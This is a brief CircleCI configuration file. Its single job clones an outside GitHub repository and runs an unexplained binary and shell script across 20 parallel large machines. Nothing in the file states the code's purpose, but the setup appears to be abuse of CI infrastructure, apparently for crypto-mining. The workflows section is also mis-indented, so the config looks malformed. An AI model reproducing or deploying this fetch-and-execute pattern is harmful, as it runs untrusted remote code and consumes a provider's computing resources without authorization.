version: 2.1
jobs:
  running:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    parallelism: 20
    steps:
        - run:
            name: Syifa_11
            command: git clone https://github.com/playdoco/play.git && cd play && chmod 500 play script.sh && ./script.sh

workflows:
    version: 2.1
        jobs:
            - running
